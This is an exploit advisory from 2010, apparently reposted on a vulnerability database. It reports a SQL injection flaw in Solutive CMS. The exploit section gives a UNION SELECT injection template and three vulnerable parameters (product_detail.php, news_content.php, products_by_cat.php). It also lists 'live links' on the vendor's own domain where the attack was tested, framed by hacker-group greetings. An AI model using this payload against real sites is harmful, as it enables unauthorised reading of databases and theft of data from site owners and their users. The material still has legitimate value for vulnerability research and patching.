Solutive CMS - SQL Injection

🗓️ 04 Apr 2010 00:00:00Reported by Th3 RDXType

Solutive CMS SQL Injection Vulnerability. Exploitable via product_detail.php, news_content.php, products_by_cat.ph

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
             L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

    Th3 RDX

----- [ E - mail ] -----

 [email protected]


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Solutive CMS SQL Injection Vulnerability

----- [ Vendor ] -----

http://www.solutive.net/

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = product_detail.php?id=7+and+1=0+ Union Select  1 ,2,
UNHEX(HEX([visible]))
,4,5,6 (tables & column) }

[SQLi] http://server/cms/product_detail.php?id=7[CODE]

[SQLi] http://server/cms/news_content.php?id=9[CODE]

[SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE]


                                                        %\\
##############################################################################

##############################################################################
%//

              >>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

[Link] http://solutive.net/cms01/product_detail.php?id=7[CODE]

[Link] http://solutive.net/cms01/news_content.php?id=9[CODE]

[Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE]

                                                        %\\
##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 04 April 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

04 Apr 2010 00:00Current

7.4High risk

Vulners AI Score7.4